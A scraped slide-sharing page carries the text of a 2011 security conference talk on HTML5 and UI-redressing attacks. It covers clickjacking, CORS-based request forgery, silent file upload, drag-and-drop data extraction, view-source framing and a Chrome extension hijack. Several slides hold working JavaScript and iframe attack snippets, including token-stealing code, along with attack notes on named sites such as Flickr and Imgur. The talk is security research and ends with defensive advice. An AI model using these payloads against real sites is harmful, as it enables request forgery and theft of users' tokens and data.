Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
Brandon Minnick, MBA
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
Uni Systems S.M.S.A.
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
Aftab Hussain
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
innovationoecd
 

Recently uploaded (20)

Taking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdfTaking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdf
 
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and MilvusGenerating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
 
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
 
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
Cosa hanno in comune un mattoncino Lego e la backdoor XZ?
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptxOcean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
 
Infrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI modelsInfrastructure Challenges in Scaling RAG with Custom AI models
Infrastructure Challenges in Scaling RAG with Custom AI models
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
 
20240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 202420240605 QFM017 Machine Intelligence Reading List May 2024
20240605 QFM017 Machine Intelligence Reading List May 2024
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
 
Full-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalizationFull-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalization
 
20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
 

Html5: something wicked this way comes - HackPra

  • 1. HTML5: Something wicked this way comes HackPra, Bochum Krzysztof Kotowicz, Securing 11.2011 krzysztof.kotowicz@securing.pl @kkotowicz
  • 2. About me • security researcher • HTML 5 • UI redressing / clickjacking • xss-track, squid-imposter, ... • pentester • IT security trainer • „Hacking HTML5” 2
  • 3. Plan • Same Origin Policy • Exploiting users • Attack toolbox • demos • obligatory 0-day ;) • Wrap-up 3
  • 4. Same origin policy • the single most important security concept for the web • restricts communication between websites from different domains • has many flavors • without it hell breaks loose • worldwide XSS mayhem 4
  • 5. Same origin policy • can be relaxed though • crossdomain.xml • document.domain • HTML5 Cross Origin Resource Sharing • or ignored... • by exploiting users • UI redressing 5
  • 6. UI Redressing? Jedi mind tricks on victim users 6
  • 7. UI Redressing • This is not the page you’re looking at • This is not the thing you’re clicking • .................................................. dragging • .................................................. typing • .................................................. copying • Victims attack the applications for us 7
  • 8. Exploiting users //goo.gl/DgPpY 8
  • 9. Combined attacks 1. Analyze target 2. Choose pieces • HTML5 • UI redressing 3. Plant the attack 4. .... 5. Profit! 9
  • 12. Framing • Frames can • move • be nested • be invisible <iframe src=//google.com style="opacity:0;"></iframe> 12
  • 13. Framing – prevention • X-Frame-Options 13
  • 14. Framing – prevention • JS Framebusting if (top !== self) {     top.location = self.location; } // and many others.... 14
  • 15. X-Frame-Options Marcus Niemietz, February 2011 • Home pages HTTP header analysis • Based on Alexa Count Rate Top 100 3 3.00% Top 1000 9 0.90% Top 10000 33 0.33% Not that popular yet 15
  • 17. Basic clickjacking 20x20 <iframe> 17
  • 18. Basic clickjacking <iframe> -300 -350 20x20 18
  • 19. Basic clickjacking <iframe> Victim website 20x20 Like us, plz! 19
  • 20. Basic clickjacking <iframe src=outer.html width=20 height=20 scrolling=no style="opacity:0;"></iframe> <!-- outer.html --> <iframe src="//victim" width=5000 height=5000 style="position: absolute; top:-300px; left: -350px;"></iframe> 20
  • 21. Basic clickjacking • Use to: click on link, button etc. • Trick: Click here to see a video! • User interaction: click + Any clickable action + Works in every browser - X-Frame-Option - JS framebusting 21
  • 22. HTML5 IFRAME sandbox • Used to embed untrusted content • prevents XSS • prevents defacement • Facilitates clickjacking! <iframe sandbox="allow-same-origin allow-forms allow-scripts" src="//victim"></iframe> //html5sec.org/#122 22
  • 23. HTML5 IFRAME sandbox • Use to: protect from frame busting + Chrome / Safari / IE 10 + Will disable most JS framebusters - X-Frame-Option 23
  • 24. Cross Origin Resource Sharing • HTML5-ish • Cross domain AJAX • With cookies • Blind • Unless the receiving site agrees • Not limited to <form> syntax 24
  • 25. Cross Origin Resource Sharing var xhr = new XMLHttpRequest();      xhr.open("POST", "http://victim", true); xhr.setRequestHeader("Content-Type", "text/plain"); xhr.withCredentials = "true"; // send cookies xhr.send("Anything I want"); 25
  • 26. Cross Origin Resource Sharing POST / HTTP/1.1 Host: victim Referer: http://dev.localhost/temp/cors.php Content-Length: 15 Origin: http://dev.localhost Content-Type: text/plain ... Cookie: my-cookie=myvalue Anything I want 26
  • 27. Cross Origin Resource Sharing • Use to: Cross Site Request Forgery • User interaction: none 27
  • 28. Silent file upload • File upload purely in Javascript • Silent <input type=file> with any file name and content • Uses CORS • How? Raw multipart/form-data 28
  • 29. Silent file upload function fileUpload(url, fileData, fileName) {    var fileSize = fileData.length,      boundary = "xxxxxxxxx",      xhr = new XMLHttpRequest();         xhr.open("POST", url, true);    xhr.withCredentials = "true";    xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);    xhr.setRequestHeader("Content-Length", fileSize); 29
  • 30. Silent file upload var body = " --" + boundary + 'rn Content-Disposition: form-data; name="contents"; filename="' + fileName + '"rn Content-Type: application/octet-streamrn rn ' + fileData + 'rn --' + boundary + '--'; xhr.send(body); 30
  • 31. Silent file upload • Use to: CSRF file upload • User interaction: none + Works in most browsers + You can add more form fields - CSRF flaw needed - No access to response 31
  • 32. Silent file upload DEMO Flickr.com 32
  • 33. Flickr.com attack toolbox • Remember me • Flickr creates logged session on first request • CSRF file upload • http://up.flickr.com/photos/upload/transfer/ • accepts file uploads • token check skipped 33
  • 34. Drag into • Put attackers content into victim form 34
  • 35. Drag into DEMO Alphabet Hero 35
  • 36. Drag into • Use to: self XSS, fill whitelists, enter comments... • Trick: Put paper in the can! • User interaction: drag & drop, click + Inject arbitrary content + Trigger self-XSS - Firefox only - X-Frame-Option - JS framebusting 36
  • 37. Drag out content extraction image image 37
  • 38. Drag out content extraction image victim <iframe> image 38
  • 39. Drag out content extraction image victim <iframe> textarea <textarea> 39
  • 40. Drag out content extraction <div id=game style="position:relative">   <img style="position:absolute;..." src="paper.png" />   <img style="position:absolute;..." src="trash.png" />       <iframe scrolling=no id=iframe style="position:absolute;opacity:0;..."> </iframe>    <textarea style="position:absolute; opacity:0;..." id=dropper></textarea> </div> 40
  • 41. Drag out content extraction 41
  • 42. Drag out content extraction 42
  • 43. Drag out content extraction $("#iframe").attr('src', 'outer.html’); $('#dropper').bind('drop', function() {     setTimeout(function() {         var urlmatch = $("#dropper").val() .match(/token=([a-h0-9]+)$/);         if (urlmatch) {             var token = urlmatch[1];             // do EVIL         }     }, 100); }); 43
  • 44. Drag out content extraction • Use to: get tokens, session ids, private data • Trick: Put paper in the can! • User interaction: drag & drop + Access sensitive content cross domain - Firefox only - X-Frame-Option - JS framebusting 44
  • 45. Drag out content extraction DEMO Min.us 45
  • 46. Min.us attack toolbox • CORS to create gallery • social engineering • extract gallery editor-id from <a href> • silent file upload to gallery • CORS change gallery to public • HTML5 + UI redressing combined! 46
  • 47. View-source • Display HTML source in frame • session IDs • tokens • private data <iframe src="view-source:view-source:http://victim" width=5000 height=5000 style="position: absolute; top: -300px; left: -150px;"> </iframe> 47
  • 50. View-source • Use to: get more content • Trick: Your serial number is... • User interaction: select + drag & drop, copy- paste + Beats JS framebusting - X-Frame-Options - Firefox only - Complicated user action 50
  • 51. View-source DEMO Imgur.com 51
  • 52. Imgur.com attack toolbox • framed view-source: • captcha-like string (AdSense ID) • session ID • social engineering: • trick to copy/paste page source • Exploitation: • http://api.imgur.com • cookie auth, no IP limits for session 52
  • 53. Google Chrome addons hijacking • HTML5 apps • Unique ID • chrome-extension://id/res.html • Can attach content scripts to pages • access page DOM • JS runtimes are separated • page canot see addon JS • addon cannot see page JS • Can exchange messages with other components 53
  • 54. Google Chrome addons hijacking • Page can load addon resources <iframe src="chrome-extension:// oadbo...adc/popup.html"></iframe> var popup = window.open(     'chrome-extension://oadbo...adc/ popup.html'); • So what? 54
  • 55. Google Chrome addons hijacking • Chrome To Phone 2.3.1 hijack 0-day //kotowicz.net/chrome-to-phone/ 55
  • 56. Google Chrome addons hijacking • popup.html chrome.extension.onConnect.addListener(function(port) {   port.onMessage.addListener(function(info) {     //...     sendToPhone(info.title, info.url, msgType, info.selection,sendToPhoneListener);   }); }); //... chrome.tabs.executeScript(null, {file: "content_script.js"}); 56
  • 57. Google Chrome addons hijacking • content_script.js var pageInfo = {   "url": document.location.href,   "title": document.title,   "selection": window.getSelection().toString() }; chrome.extension.connect().postMessage(pageInfo); 57
  • 58. Google Chrome addons hijacking 1. popup loads when you click 2. starts listening 3. adds a script to current tab 4. script sends current URL 5. popup gets URL and sends to Android http://... popup.html content_script.js 58
  • 59. Google Chrome addons hijacking • manifest.json    "content_scripts": [ {       "js": [ "content_script.js" ],       "matches": [ "http://*/*", "https://*/*" ]    } ], • Sending script is always attached to every page on every tab http://... content_script.js 59
  • 60. Google Chrome addons hijacking 60
  • 61. Google Chrome addons hijacking • We just have to start listening var popup = window.open('chrome- extension://..../popup.html'); window.focus(); // hide popup 61
  • 62. Summary • UI redressing attacks are improving • HTML5 helps exploiting vulnerabilities • Users can be a weak link too! Developers: Use X-Frame-Options: DENY 62
  • 63. Links • html5sec.org • code.google.com/p/html5security • www.contextis.co.uk/research/white-papers/ clickjacking • blog.kotowicz.net • github.com/koto Twitter: @kkotowicz kkotowicz@securing.pl 63
  • 64. ? 64